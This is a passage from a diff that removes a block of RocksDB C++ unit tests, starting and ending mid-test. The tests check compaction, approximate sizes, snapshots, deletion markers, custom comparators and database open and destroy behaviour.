-        options.num_levels + options.level0_stop_writes_trigger;
-
-    Random rnd(301);
-    std::string value =
-        RandomString(&rnd, static_cast<int>(2 * options.write_buffer_size));
-    for (int i = 0; i < 5 * kMaxFiles; i++) {
-      ASSERT_OK(Put(1, "key", value));
-      ASSERT_LE(TotalTableFiles(1), kMaxFiles);
-    }
-  } while (ChangeCompactOptions());
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, SparseMerge) {
-  do {
-    Options options = CurrentOptions();
-    options.compression = kNoCompression;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    FillLevels("A", "Z", 1);
-
-    // Suppose there is:
-    //    small amount of data with prefix A
-    //    large amount of data with prefix B
-    //    small amount of data with prefix C
-    // and that recent updates have made small changes to all three prefixes.
-    // Check that we do not do a compaction that merges all of B in one shot.
-    const std::string value(1000, 'x');
-    Put(1, "A", "va");
-    // Write approximately 100MB of "B" values
-    for (int i = 0; i < 100000; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      Put(1, key, value);
-    }
-    Put(1, "C", "vc");
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-
-    // Make sparse update
-    Put(1, "A", "va2");
-    Put(1, "B100", "bvalue2");
-    Put(1, "C", "vc2");
-    ASSERT_OK(Flush(1));
-
-    // Compactions should not cause us to create a situation where
-    // a file overlaps too much data at the next level.
-    ASSERT_LE(dbfull()->TEST_MaxNextLevelOverlappingBytes(handles_[1]),
-              20 * 1048576);
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-    ASSERT_LE(dbfull()->TEST_MaxNextLevelOverlappingBytes(handles_[1]),
-              20 * 1048576);
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr);
-    ASSERT_LE(dbfull()->TEST_MaxNextLevelOverlappingBytes(handles_[1]),
-              20 * 1048576);
-  } while (ChangeCompactOptions());
-}
-
-#ifndef ROCKSDB_LITE
-static bool Between(uint64_t val, uint64_t low, uint64_t high) {
-  bool result = (val >= low) && (val <= high);
-  if (!result) {
-    fprintf(stderr, "Value %llu is not in range [%llu, %llu]\n",
-            (unsigned long long)(val), (unsigned long long)(low),
-            (unsigned long long)(high));
-  }
-  return result;
-}
-
-TEST_F(DBTest, ApproximateSizesMemTable) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;  // Large write buffer
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  const int N = 128;
-  Random rnd(301);
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  uint64_t size;
-  std::string start = Key(50);
-  std::string end = Key(60);
-  Range r(start, end);
-  uint8_t include_both = DB::SizeApproximationFlags::INCLUDE_FILES |
-                         DB::SizeApproximationFlags::INCLUDE_MEMTABLES;
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_GT(size, 6000);
-  ASSERT_LT(size, 204800);
-  // Zero if not including mem table
-  db_->GetApproximateSizes(&r, 1, &size);
-  ASSERT_EQ(size, 0);
-
-  start = Key(500);
-  end = Key(600);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(1000 + i), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(500);
-  end = Key(600);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  start = Key(100);
-  end = Key(1020);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_GT(size, 6000);
-
-  options.max_write_buffer_number = 8;
-  options.min_write_buffer_number_to_merge = 5;
-  options.write_buffer_size = 1024 * N;  // Not very large
-  DestroyAndReopen(options);
-
-  int keys[N * 3];
-  for (int i = 0; i < N; i++) {
-    keys[i * 3] = i * 5;
-    keys[i * 3 + 1] = i * 5 + 1;
-    keys[i * 3 + 2] = i * 5 + 2;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  for (int i = 0; i < N * 3; i++) {
-    ASSERT_OK(Put(Key(keys[i] + 1000), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(100);
-  end = Key(300);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  start = Key(1050);
-  end = Key(1080);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_GT(size, 6000);
-
-  start = Key(2100);
-  end = Key(2300);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  start = Key(1050);
-  end = Key(1080);
-  r = Range(start, end);
-  uint64_t size_with_mt, size_without_mt;
-  db_->GetApproximateSizes(&r, 1, &size_with_mt, include_both);
-  ASSERT_GT(size_with_mt, 6000);
-  db_->GetApproximateSizes(&r, 1, &size_without_mt);
-  ASSERT_EQ(size_without_mt, 0);
-
-  Flush();
-
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(i + 1000), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(1050);
-  end = Key(1080);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size_with_mt, include_both);
-  db_->GetApproximateSizes(&r, 1, &size_without_mt);
-  ASSERT_GT(size_with_mt, size_without_mt);
-  ASSERT_GT(size_without_mt, 6000);
-}
-
-TEST_F(DBTest, GetApproximateMemTableStats) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  const int N = 128;
-  Random rnd(301);
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  uint64_t count;
-  uint64_t size;
-
-  std::string start = Key(50);
-  std::string end = Key(60);
-  Range r(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_GT(count, 0);
-  ASSERT_LE(count, N);
-  ASSERT_GT(size, 6000);
-  ASSERT_LT(size, 204800);
-
-  start = Key(500);
-  end = Key(600);
-  r = Range(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_EQ(count, 0);
-  ASSERT_EQ(size, 0);
-
-  Flush();
-
-  start = Key(50);
-  end = Key(60);
-  r = Range(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_EQ(count, 0);
-  ASSERT_EQ(size, 0);
-
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(1000 + i), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(100);
-  end = Key(1020);
-  r = Range(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_GT(count, 20);
-  ASSERT_GT(size, 6000);
-}
-
-TEST_F(DBTest, ApproximateSizes) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 100000000;  // Large write buffer
-    options.compression = kNoCompression;
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_TRUE(Between(Size("", "xyz", 1), 0, 0));
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    ASSERT_TRUE(Between(Size("", "xyz", 1), 0, 0));
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    const int N = 80;
-    static const int S1 = 100000;
-    static const int S2 = 105000;  // Allow some expansion from metadata
-    Random rnd(301);
-    for (int i = 0; i < N; i++) {
-      ASSERT_OK(Put(1, Key(i), RandomString(&rnd, S1)));
-    }
-
-    // 0 because GetApproximateSizes() does not account for memtable space
-    ASSERT_TRUE(Between(Size("", Key(50), 1), 0, 0));
-
-    // Check sizes across recovery by reopening a few times
-    for (int run = 0; run < 3; run++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-      for (int compact_start = 0; compact_start < N; compact_start += 10) {
-        for (int i = 0; i < N; i += 10) {
-          ASSERT_TRUE(Between(Size("", Key(i), 1), S1 * i, S2 * i));
-          ASSERT_TRUE(Between(Size("", Key(i) + ".suffix", 1), S1 * (i + 1),
-                              S2 * (i + 1)));
-          ASSERT_TRUE(Between(Size(Key(i), Key(i + 10), 1), S1 * 10, S2 * 10));
-        }
-        ASSERT_TRUE(Between(Size("", Key(50), 1), S1 * 50, S2 * 50));
-        ASSERT_TRUE(
-            Between(Size("", Key(50) + ".suffix", 1), S1 * 50, S2 * 50));
-
-        std::string cstart_str = Key(compact_start);
-        std::string cend_str = Key(compact_start + 9);
-        Slice cstart = cstart_str;
-        Slice cend = cend_str;
-        dbfull()->TEST_CompactRange(0, &cstart, &cend, handles_[1]);
-      }
-
-      ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-      ASSERT_GT(NumTableFilesAtLevel(1, 1), 0);
-    }
-    // ApproximateOffsetOf() is not yet implemented in plain table format.
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction |
-                         kSkipPlainTable | kSkipHashIndex));
-}
-
-TEST_F(DBTest, ApproximateSizes_MixOfSmallAndLarge) {
-  do {
-    Options options = CurrentOptions();
-    options.compression = kNoCompression;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Random rnd(301);
-    std::string big1 = RandomString(&rnd, 100000);
-    ASSERT_OK(Put(1, Key(0), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(1), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(2), big1));
-    ASSERT_OK(Put(1, Key(3), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(4), big1));
-    ASSERT_OK(Put(1, Key(5), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(6), RandomString(&rnd, 300000)));
-    ASSERT_OK(Put(1, Key(7), RandomString(&rnd, 10000)));
-
-    // Check sizes across recovery by reopening a few times
-    for (int run = 0; run < 3; run++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-      ASSERT_TRUE(Between(Size("", Key(0), 1), 0, 0));
-      ASSERT_TRUE(Between(Size("", Key(1), 1), 10000, 11000));
-      ASSERT_TRUE(Between(Size("", Key(2), 1), 20000, 21000));
-      ASSERT_TRUE(Between(Size("", Key(3), 1), 120000, 121000));
-      ASSERT_TRUE(Between(Size("", Key(4), 1), 130000, 131000));
-      ASSERT_TRUE(Between(Size("", Key(5), 1), 230000, 231000));
-      ASSERT_TRUE(Between(Size("", Key(6), 1), 240000, 241000));
-      ASSERT_TRUE(Between(Size("", Key(7), 1), 540000, 541000));
-      ASSERT_TRUE(Between(Size("", Key(8), 1), 550000, 560000));
-
-      ASSERT_TRUE(Between(Size(Key(3), Key(5), 1), 110000, 111000));
-
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-    }
-    // ApproximateOffsetOf() is not yet implemented in plain table format.
-  } while (ChangeOptions(kSkipPlainTable));
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, Snapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    Put(0, "foo", "0v1");
-    Put(1, "foo", "1v1");
-
-    const Snapshot* s1 = db_->GetSnapshot();
-    ASSERT_EQ(1U, GetNumSnapshots());
-    uint64_t time_snap1 = GetTimeOldestSnapshots();
-    ASSERT_GT(time_snap1, 0U);
-    Put(0, "foo", "0v2");
-    Put(1, "foo", "1v2");
-
-    env_->addon_time_.fetch_add(1);
-
-    const Snapshot* s2 = db_->GetSnapshot();
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    Put(0, "foo", "0v3");
-    Put(1, "foo", "1v3");
-
-    {
-      ManagedSnapshot s3(db_);
-      ASSERT_EQ(3U, GetNumSnapshots());
-      ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-
-      Put(0, "foo", "0v4");
-      Put(1, "foo", "1v4");
-      ASSERT_EQ("0v1", Get(0, "foo", s1));
-      ASSERT_EQ("1v1", Get(1, "foo", s1));
-      ASSERT_EQ("0v2", Get(0, "foo", s2));
-      ASSERT_EQ("1v2", Get(1, "foo", s2));
-      ASSERT_EQ("0v3", Get(0, "foo", s3.snapshot()));
-      ASSERT_EQ("1v3", Get(1, "foo", s3.snapshot()));
-      ASSERT_EQ("0v4", Get(0, "foo"));
-      ASSERT_EQ("1v4", Get(1, "foo"));
-    }
-
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    ASSERT_EQ("0v1", Get(0, "foo", s1));
-    ASSERT_EQ("1v1", Get(1, "foo", s1));
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-
-    db_->ReleaseSnapshot(s1);
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-    ASSERT_EQ(1U, GetNumSnapshots());
-    ASSERT_LT(time_snap1, GetTimeOldestSnapshots());
-
-    db_->ReleaseSnapshot(s2);
-    ASSERT_EQ(0U, GetNumSnapshots());
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-TEST_F(DBTest, HiddenValuesAreRemoved) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    Random rnd(301);
-    FillLevels("a", "z", 1);
-
-    std::string big = RandomString(&rnd, 50000);
-    Put(1, "foo", big);
-    Put(1, "pastfoo", "v");
-    const Snapshot* snapshot = db_->GetSnapshot();
-    Put(1, "foo", "tiny");
-    Put(1, "pastfoo2", "v2");  // Advance sequence number one more
-
-    ASSERT_OK(Flush(1));
-    ASSERT_GT(NumTableFilesAtLevel(0, 1), 0);
-
-    ASSERT_EQ(big, Get(1, "foo", snapshot));
-    ASSERT_TRUE(Between(Size("", "pastfoo", 1), 50000, 60000));
-    db_->ReleaseSnapshot(snapshot);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ tiny, " + big + " ]");
-    Slice x("x");
-    dbfull()->TEST_CompactRange(0, nullptr, &x, handles_[1]);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ tiny ]");
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    ASSERT_GE(NumTableFilesAtLevel(1, 1), 1);
-    dbfull()->TEST_CompactRange(1, nullptr, &x, handles_[1]);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ tiny ]");
-
-    ASSERT_TRUE(Between(Size("", "pastfoo", 1), 0, 1000));
-    // ApproximateOffsetOf() is not yet implemented in plain table format,
-    // which is used by Size().
-    // skip HashCuckooRep as it does not support snapshot
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction |
-                         kSkipPlainTable | kSkipHashCuckoo));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, UnremovableSingleDelete) {
-  // If we compact:
-  //
-  // Put(A, v1) Snapshot SingleDelete(A) Put(A, v2)
-  //
-  // We do not want to end up with:
-  //
-  // Put(A, v1) Snapshot Put(A, v2)
-  //
-  // Because a subsequent SingleDelete(A) would delete the Put(A, v2)
-  // but not Put(A, v1), so Get(A) would return v1.
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "foo", "first");
-    const Snapshot* snapshot = db_->GetSnapshot();
-    SingleDelete(1, "foo");
-    Put(1, "foo", "second");
-    ASSERT_OK(Flush(1));
-
-    ASSERT_EQ("first", Get(1, "foo", snapshot));
-    ASSERT_EQ("second", Get(1, "foo"));
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ("[ second, SDEL, first ]", AllEntriesFor("foo", 1));
-
-    SingleDelete(1, "foo");
-
-    ASSERT_EQ("first", Get(1, "foo", snapshot));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-
-    ASSERT_EQ("first", Get(1, "foo", snapshot));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    db_->ReleaseSnapshot(snapshot);
-    // Skip HashCuckooRep as it does not support single delete.  FIFO and
-    // universal compaction do not apply to the test case.  Skip MergePut
-    // because single delete does not get removed when it encounters a merge.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, DeletionMarkers1) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Put(1, "foo", "v1");
-  ASSERT_OK(Flush(1));
-  const int last = 2;
-  MoveFilesToLevel(last, 1);
-  // foo => v1 is now in last level
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-
-  // Place a table at level last-1 to prevent merging with preceding mutation
-  Put(1, "a", "begin");
-  Put(1, "z", "end");
-  Flush(1);
-  MoveFilesToLevel(last - 1, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last - 1, 1), 1);
-
-  Delete(1, "foo");
-  Put(1, "foo", "v2");
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, DEL, v1 ]");
-  ASSERT_OK(Flush(1));  // Moves to level last-2
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, v1 ]");
-  Slice z("z");
-  dbfull()->TEST_CompactRange(last - 2, nullptr, &z, handles_[1]);
-  // DEL eliminated, but v1 remains because we aren't compacting that level
-  // (DEL can be eliminated because v2 hides v1).
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, v1 ]");
-  dbfull()->TEST_CompactRange(last - 1, nullptr, nullptr, handles_[1]);
-  // Merging last-1 w/ last, so we are the base level for "foo", so
-  // DEL is removed.  (as is v1).
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2 ]");
-}
-
-TEST_F(DBTest, DeletionMarkers2) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Put(1, "foo", "v1");
-  ASSERT_OK(Flush(1));
-  const int last = 2;
-  MoveFilesToLevel(last, 1);
-  // foo => v1 is now in last level
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-
-  // Place a table at level last-1 to prevent merging with preceding mutation
-  Put(1, "a", "begin");
-  Put(1, "z", "end");
-  Flush(1);
-  MoveFilesToLevel(last - 1, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last - 1, 1), 1);
-
-  Delete(1, "foo");
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v1 ]");
-  ASSERT_OK(Flush(1));  // Moves to level last-2
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v1 ]");
-  dbfull()->TEST_CompactRange(last - 2, nullptr, nullptr, handles_[1]);
-  // DEL kept: "last" file overlaps
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v1 ]");
-  dbfull()->TEST_CompactRange(last - 1, nullptr, nullptr, handles_[1]);
-  // Merging last-1 w/ last, so we are the base level for "foo", so
-  // DEL is removed.  (as is v1).
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-}
-
-TEST_F(DBTest, OverlapInLevel0) {
-  do {
-    Options options = CurrentOptions();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Fill levels 1 and 2 to disable the pushing of new memtables to levels >
-    // 0.
-    ASSERT_OK(Put(1, "100", "v100"));
-    ASSERT_OK(Put(1, "999", "v999"));
-    Flush(1);
-    MoveFilesToLevel(2, 1);
-    ASSERT_OK(Delete(1, "100"));
-    ASSERT_OK(Delete(1, "999"));
-    Flush(1);
-    MoveFilesToLevel(1, 1);
-    ASSERT_EQ("0,1,1", FilesPerLevel(1));
-
-    // Make files spanning the following ranges in level-0:
-    //  files[0]  200 .. 900
-    //  files[1]  300 .. 500
-    // Note that files are sorted by smallest key.
-    ASSERT_OK(Put(1, "300", "v300"));
-    ASSERT_OK(Put(1, "500", "v500"));
-    Flush(1);
-    ASSERT_OK(Put(1, "200", "v200"));
-    ASSERT_OK(Put(1, "600", "v600"));
-    ASSERT_OK(Put(1, "900", "v900"));
-    Flush(1);
-    ASSERT_EQ("2,1,1", FilesPerLevel(1));
-
-    // Compact away the placeholder files we created initially
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    dbfull()->TEST_CompactRange(2, nullptr, nullptr, handles_[1]);
-    ASSERT_EQ("2", FilesPerLevel(1));
-
-    // Do a memtable compaction.  Before bug-fix, the compaction would
-    // not detect the overlap with level-0 files and would incorrectly place
-    // the deletion in a deeper level.
-    ASSERT_OK(Delete(1, "600"));
-    Flush(1);
-    ASSERT_EQ("3", FilesPerLevel(1));
-    ASSERT_EQ("NOT_FOUND", Get(1, "600"));
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, ComparatorCheck) {
-  class NewComparator : public Comparator {
-   public:
-    virtual const char* Name() const override {
-      return "rocksdb.NewComparator";
-    }
-    virtual int Compare(const Slice& a, const Slice& b) const override {
-      return BytewiseComparator()->Compare(a, b);
-    }
-    virtual void FindShortestSeparator(std::string* s,
-                                       const Slice& l) const override {
-      BytewiseComparator()->FindShortestSeparator(s, l);
-    }
-    virtual void FindShortSuccessor(std::string* key) const override {
-      BytewiseComparator()->FindShortSuccessor(key);
-    }
-  };
-  Options new_options, options;
-  NewComparator cmp;
-  do {
-    options = CurrentOptions();
-    CreateAndReopenWithCF({"pikachu"}, options);
-    new_options = CurrentOptions();
-    new_options.comparator = &cmp;
-    // only the non-default column family has non-matching comparator
-    Status s = TryReopenWithColumnFamilies(
-        {"default", "pikachu"}, std::vector<Options>({options, new_options}));
-    ASSERT_TRUE(!s.ok());
-    ASSERT_TRUE(s.ToString().find("comparator") != std::string::npos)
-        << s.ToString();
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTest, CustomComparator) {
-  class NumberComparator : public Comparator {
-   public:
-    virtual const char* Name() const override {
-      return "test.NumberComparator";
-    }
-    virtual int Compare(const Slice& a, const Slice& b) const override {
-      return ToNumber(a) - ToNumber(b);
-    }
-    virtual void FindShortestSeparator(std::string* s,
-                                       const Slice& l) const override {
-      ToNumber(*s);  // Check format
-      ToNumber(l);   // Check format
-    }
-    virtual void FindShortSuccessor(std::string* key) const override {
-      ToNumber(*key);  // Check format
-    }
-
-   private:
-    static int ToNumber(const Slice& x) {
-      // Check that there are no extra characters.
-      EXPECT_TRUE(x.size() >= 2 && x[0] == '[' && x[x.size() - 1] == ']')
-          << EscapeString(x);
-      int val;
-      char ignored;
-      EXPECT_TRUE(sscanf(x.ToString().c_str(), "[%i]%c", &val, &ignored) == 1)
-          << EscapeString(x);
-      return val;
-    }
-  };
-  Options new_options;
-  NumberComparator cmp;
-  do {
-    new_options = CurrentOptions();
-    new_options.create_if_missing = true;
-    new_options.comparator = &cmp;
-    new_options.write_buffer_size = 4096;  // Compact more often
-    new_options.arena_block_size = 4096;
-    new_options = CurrentOptions(new_options);
-    DestroyAndReopen(new_options);
-    CreateAndReopenWithCF({"pikachu"}, new_options);
-    ASSERT_OK(Put(1, "[10]", "ten"));
-    ASSERT_OK(Put(1, "[0x14]", "twenty"));
-    for (int i = 0; i < 2; i++) {
-      ASSERT_EQ("ten", Get(1, "[10]"));
-      ASSERT_EQ("ten", Get(1, "[0xa]"));
-      ASSERT_EQ("twenty", Get(1, "[20]"));
-      ASSERT_EQ("twenty", Get(1, "[0x14]"));
-      ASSERT_EQ("NOT_FOUND", Get(1, "[15]"));
-      ASSERT_EQ("NOT_FOUND", Get(1, "[0xf]"));
-      Compact(1, "[0]", "[9999]");
-    }
-
-    for (int run = 0; run < 2; run++) {
-      for (int i = 0; i < 1000; i++) {
-        char buf[100];
-        snprintf(buf, sizeof(buf), "[%d]", i * 10);
-        ASSERT_OK(Put(1, buf, buf));
-      }
-      Compact(1, "[0]", "[1000000]");
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTest, DBOpen_Options) {
-  Options options = CurrentOptions();
-  std::string dbname = test::TmpDir(env_) + "/db_options_test";
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Does not exist, and create_if_missing == false: error
-  DB* db = nullptr;
-  options.create_if_missing = false;
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "does not exist") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does not exist, and create_if_missing == true: OK
-  options.create_if_missing = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-
-  // Does exist, and error_if_exists == true: error
-  options.create_if_missing = false;
-  options.error_if_exists = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "exists") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does exist, and error_if_exists == false: OK
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-}
-
-TEST_F(DBTest, DBOpen_Change_NumLevels) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  ASSERT_TRUE(db_ != nullptr);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "a", "123"));
-  ASSERT_OK(Put(1, "b", "234"));
-  Flush(1);
-  MoveFilesToLevel(3, 1);
-  Close();
-
-  options.create_if_missing = false;
-  options.num_levels = 2;
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "Invalid argument") != nullptr);
-  ASSERT_TRUE(db_ == nullptr);
-}
-
-TEST_F(DBTest, DestroyDBMetaDatabase) {
-  std::string dbname = test::TmpDir(env_) + "/db_meta";
-  ASSERT_OK(env_->CreateDirIfMissing(dbname));
-  std::string metadbname = MetaDatabaseName(dbname, 0);
-  ASSERT_OK(env_->CreateDirIfMissing(metadbname));
-  std::string metametadbname = MetaDatabaseName(metadbname, 0);
-  ASSERT_OK(env_->CreateDirIfMissing(metametadbname));
-
-  // Destroy previous versions if they exist. Using the long way.
-  Options options = CurrentOptions();
-  ASSERT_OK(DestroyDB(metametadbname, options));
-  ASSERT_OK(DestroyDB(metadbname, options));
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Setup databases
-  DB* db = nullptr;
-  ASSERT_OK(DB::Open(options, dbname, &db));
-  delete db;
-  db = nullptr;
-  ASSERT_OK(DB::Open(options, metadbname, &db));
-  delete db;
-  db = nullptr;
-  ASSERT_OK(DB::Open(options, metametadbname, &db));
-  delete db;
-  db = nullptr;
-
-  // Delete databases
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Check if deletion worked.
-  options.create_if_missing = false;
-  ASSERT_TRUE(!(DB::Open(options, dbname, &db)).ok());
-  ASSERT_TRUE(!(DB::Open(options, metadbname, &db)).ok());
-  ASSERT_TRUE(!(DB::Open(options, metametadbname, &db)).ok());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, SnapshotFiles) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 100000000;  // Large write buffer
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Random rnd(301);
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    std::vector<std::string> values;
-    for (int i = 0; i < 80; i++) {
-      values.push_back(RandomString(&rnd, 100000));
-      ASSERT_OK(Put((i < 40), Key(i), values[i]));
-    }
-
-    // assert that nothing makes it to disk yet.
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-
-    // get a file snapshot
-    uint64_t manifest_number = 0;
-    uint64_t manifest_size = 0;
-    std::vector<std::string> files;
-    dbfull()->DisableFileDeletions();
-    dbfull()->GetLiveFiles(files, &manifest_size);
-
-    // CURRENT, MANIFEST, OPTIONS, *.sst files (one for each CF)
-    ASSERT_EQ(files.size(), 5U);
-
-    uint64_t number = 0;
-    FileType type;
-
-    // copy these files to a new snapshot directory
-    std::string snapdir = dbname_ + ".snapdir/";
-    ASSERT_OK(env_->CreateDirIfMissing(snapdir));
-
-    for (size_t i = 0; i < files.size(); i++) {
-      // our clients require that GetLiveFiles returns
-      // files with "/" as first character!
-      ASSERT_EQ(files[i][0], '/');
-      std::string src = dbname_ + files[i];
-      std::string dest = snapdir + files[i];
-
